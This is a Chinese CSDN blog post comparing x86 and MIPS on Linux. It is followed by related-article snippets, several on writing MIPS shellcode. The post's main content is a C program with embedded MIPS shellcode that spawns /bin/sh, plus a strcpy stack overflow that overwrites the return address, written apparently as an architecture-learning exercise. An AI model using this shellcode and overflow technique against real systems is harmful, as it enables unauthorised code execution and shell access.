Linux下X86与MIPS区别之一:代码放在数据区是否可以被执行

最新推荐文章于 2022-07-14 18:30:49 发布
最新推荐文章于 2022-07-14 18:30:49 发布
阅读量1k 收藏
点赞数
分类专栏: 计算机体系结构 Linux文件系统
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/txxm127/article/details/25809635
版权

                                                                                                        学习时间:2013/9/10

X86与MIPS区别:

(1)代码放在数据区是可以被执行的,而MIPS却不可以;(2)函数调用开辟栈空间大小不一样。
以下是基于MIPS上的一段把执行代码放在数据区的程序:
#include
char shellcode[] = {
"\x50\x73\x06\x24"
"\xff\xff\xd0\x04"
"\x50\x73\x0f\x24"
"\xff\xff\x06\x28"
"\xe0\xff\xbd\x27"
"\xd7\xff\x0f\x24"
"\x27\x78\xe0\x01"
"\x21\x20\xef\x03"
"\xe8\xff\xa4\xaf"
"\xec\xff\xa0\xaf"
"\xe8\xff\xa5\x23"
"\xab\x0f\x02\x24"
"\x0c\x01\x01\x01"
"/bin/sh"
};

long addra;

char large_string[144];

int main()
{
foo();
printf("The programe can not modify the address of ra(m)!!!\n");
};

void foo()
{ int i;
char buffer[128];
printf("=================================================================\n");
printf("the buffer address is %x\n",&buffer);
addra = buffer+136;

long *p;
p=addra;

printf("before strcpy() function,the address of ra(m) is 0x%x\n",addra);
printf("before strcpy() function,the value of ra(m) is 0x%x\n",*p);

long *long_ptr = (long *)large_string;
for (i = 0; i < 36; i++)
{
*(long_ptr + i) = (int)buffer;
}
for (i = 0; i <(int)strlen(shellcode); i++)
large_string[i] = shellcode[i];

strcpy(buffer, large_string);
printf("\n\nAfter strcpy() function,the address of ra(m) is 0x%x\n",addra);
printf("After strcpy() function,the value of ra(m) is 0x%x\n",*p);
printf("=================================================================\n");
return ;
}
txxm127
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
三种主流芯片架构
a7257825的博客
08-17 3565
三种主流芯片架构简单比较 三种主流芯片架构   1. ARM ARM是高级精简指令集的简称(Advanced RISC Machine),它是一个32位的精简指令集架构,但也配备16位指令集,一般来讲比等价32位代码节省达35%,却能保留32位系统的所有优势。ARM处理器的主要特点是: (1)体积小、低功耗、低成本、高性能——ARM被广泛应用在嵌入式系统中的最重要的原因 支持Thumb(...
mips-x86.win32-xgcc,是MIPS在windows上面的安装版本
09-27
mips-x86.win32-xgcc,是MIPS在windows上面的安装版本,适合win7、win8 、win10、 mips-x86.win32-xgcc,是MIPS在windows上面的安装版本,适合win7、win8 、win10、
Linux 存储管理分析札记
四度空间
01-10 1408
1. MIPSX86 的 TLB 差别其在于对 TLB 不命中时的处理上:MIPS 会触发TLB Refill 异常,内核的 tlb_refill_handler 会以 pgd_current 为当前进程的 PGD 基址,索引获得转换失败的虚址对应的 PTE,并将其填入 TLB,完了CPU 把刚刚转换失败的虚地址再走一下 TLB 就OK了。而 X86 在 TLB 不命中时,是由硬件 MMU
x86 vs mips
海棠花的博客
08-24 1595
x86 vs mips 计算机CPU两代指令集: CISC:目的是用最少的机器指令来完成所需的计算任务。同时指令集丰富。 代表 架构 X86、 RISC:基于一个事实“一个典型程序运算过程所使用的80%指令只占一个处理器指令系统的20%”。RISC就是选取常用指令,剔除不常使用的指令,降低运算器的复杂度和面积。 代表架构 ARM、MIPS、PowerPC、RISC-V 例子:a*=b 编译后的汇...
mips 内存 linux,MIPSlinux中的内存映射
weixin_33524408的博客
04-30 230
如图: 一些说明:1.内核从什么地方开始运行MIPS Linux内核的代码构建为在kseg0运行;虚拟地址从0x80000000向上。这个范围的地址仅仅是一个到物理内存低512MB的窗口,无需TLB管理。2.异常入口点:大多数MIPS CPU中,这都是由硬件布线固化到kseg0底部附近。最新的CPU可以提供EBase寄存器,对异常入口重新定位。主要是让多个共享内存的CPU能用不同的异常处理程...
x86架构Linux下的MIPS交叉编译工具链 mips-mti-elf-*
07-23
本文将深入探讨“x86架构Linux下的MIPS交叉编译工具链 mips-mti-elf-*”及其相关知识点,以及如何利用“Codescape.GNU.Tools.Package.2017.10-05.for.MIPS.MTI.Bare.Metal.CentOS-5.x86_64”进行MIPS架构的程序开发...
mips-x86.linux-xgcc.tgz
11-15
本文将深入探讨标题为“mips-x86.linux-xgcc.tgz”的压缩包,它包含了一个用于在X86平台上构建MIPS架构Linux系统的交叉编译工具链。这个工具链的核心是xgcc,它是GCC(GNU Compiler Collection)的一个定制版本,...
ethtool工具包括linux版本arm64-v8a\armeabi-v7a、x86mips64
最新发布
05-24
ethtool是一款在Linux操作系统中广泛使用的命令行工具,它提供了对网络接口卡(NIC,Network Interface Controller)的高级配置和诊断功能。这个工具对于系统管理员和网络工程师来说至关重要,因为它允许他们深入到...
mips-x86_64.linux-xgcc.tar.gz
11-28
标题 "mips-x86_64.linux-xgcc.tar.gz" 暗示这是一个针对MIPS架构的交叉编译工具链,它被打包在了一个gzip压缩的tar文件中。这个文件名中的"x86_64"表示该工具链是在x86_64平台上构建的,用于生成能够在MIPS架构上...
vMIPS:我正在构建一个虚拟化层,以便在x86硬件上运行mips代码
05-03
旨在实现一个MIPS(Microprocessor without Interlocked Pipeline Stages,无锁管道阶段微处理器)架构的模拟器,使得MIPS汇编代码或编译为MIPS指令集的应用程序能够在非MIPS架构的硬件,如x86平台上运行。...
shellcode2assembly:ARCH:ARM,ARM64,MIPS,PPC,X86
03-02
ShellcodeToAssembly 用您的shellcode替换shellcodetoasm.py。 {Endian类型是little endian。 } shellcode = ' ' 安装 git clone https://github.com/blacknbunny/ShellcodeToAssembly.git && cd ShellcodeToAssembly/ && pip2 install -r requirements.txt && python2 shellcodetoasm.py 模块手动安装 pip install -r requirements.txt可以是pip2 install -r requirements.txt 用法 python2 shellcodetoasm.py [returnbit] [architecture] [assembly-fl
linux x86 arm mips,QEMU 4.1 发布,为ARM,MIPSx86带来许多改进
weixin_39801475的博客
05-13 186
QEMU 4.1现在已经成为开源Linux虚拟化堆栈的重要部分之一。QEMU 4.1为ARM、MIPS、POWER、s390、x86,甚至RISC-V的各种特定于体系结构的位带来了许多改进。在Arm前端,现在添加了对Cortex-M处理器的FPU仿真支持、ARMv8.5 RNG支持和其他一些位。在RISC-V前端是Spike机器模型,ISA 1.11支持,并支持设备树中的CPU拓扑。在x86前端,...
linux x86 vs arm&mips 启动流程对比
老五的作坊
07-10 598
linux 开发的需要了解启动流程,不建议一下子就钻进去研究整个流程(你会发现流程很复杂,细节很多),建议带着问题去看,不如优化启动流程时间,然后分阶段的处理,这样效果会好很多。在我们做开发的过程中不同架构下linux的启动流程稍有不同,下图展示,建议遇到问题再对应阶段具体分析。 1:x86 2:arm & mips ...
从预防缓冲溢出看MIPSX86在函数调用开辟栈的区别
txxm127的专栏
05-14 1172
   学习时间:2013/9/16 Linux下有三类获取函数调用栈信息的函数: (1)__builtin_frame_address();(2)__builtin_return_address();(3)backtrace()类。 但是经过测试发现在MIPS架构的处理器上都不能正常使用。通过分析X86MIPS函数调用的反汇编代码,可以得到X86架构与MIPS架构在函数调用的时候开辟
【网络资源学习笔记】ShellCode相关内容学习
天在等我,菜鸟想飞
07-14 2540
个人shellcode相关网络资源学习记录
MIPS shellcode
Starr
03-29 2409
文章目录1. MIPS linux 系统调用writeexecve2. 编码优化优化方法-指令优化编码优化3. 通用shellcodereboot shellcodereverse_tcp shellcode 1. MIPS linux 系统调用 MIPS没有int 0x80, 而是使用syscall进行系统调用。 syscall($v0, $a0, $a1, $a2...); 汇编: li $a0, 0 li $v0, 4001 # exit syscall $v0为系统调用号, 定义位于/usr/in
十五、MIPS ShellCode
wanhex的博客
03-10 773
狭义上得Shellcode是指,向进程植入的一段用于获取Shell的代码,事实上,如今的Shellcode所具备的功能已经不仅仅包括获取Shell,还包括开启端口、执行命令等。 Shellcode通常使用汇编语言编写,最终将其转换成机器可识别的二进制机器码,其内容和长度还会受到很多苛刻的限制,因此开发和调试的难度非常高。 Shellcode编写好后,通常在程序的可注入点,将Shellcode注入到...
MIPS下shellcode编写
Yale的博客
05-27 618
这次实验我们来学习mips下shellcode的编写。 我们知道linux下实现系统调用时利用了x86体系结构下的软件中断,也就是调用int 0x80这条指令,这是在x86下编写shellcode的办法。前面的知识中我们学习到mips中没有这个中断,我们用以代替的是使用syscall指令进行系统调用。Syscall的调用方法为:在调用之前,0x80这条指令,这是在x86下编写shellcode的办法。前面的知识中我们学习到mips中没有这个中断,我们用以代替的是使用syscall指令进行系统调用。 Sysc
解读x86、ARM和MIPS三种主流芯片架构
胭脂草的ABC博客
08-18 4836
来源:OFweek 通信网收藏   指令集可分为复杂指令集(CISC)和精简指令集(RISC)两部分,代表架构分别是x86、ARM和MIPS。   ARMRISC是为了提高处理器运行速度而设计的芯片体系,它的关键技术在于流水线操作即在一个时钟周期里完成多条指令。相较复杂指令集CISC而言,以RISC为架构体系的ARM指令集的指令格式统一、种类少、寻址方式少,简单的指令意味着相应硬件线路可以尽量做到最佳化,从而提高执行速率。因为指令集的精简,所以许多工作必须组合简单的指令,而针对复杂组合的工作便需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值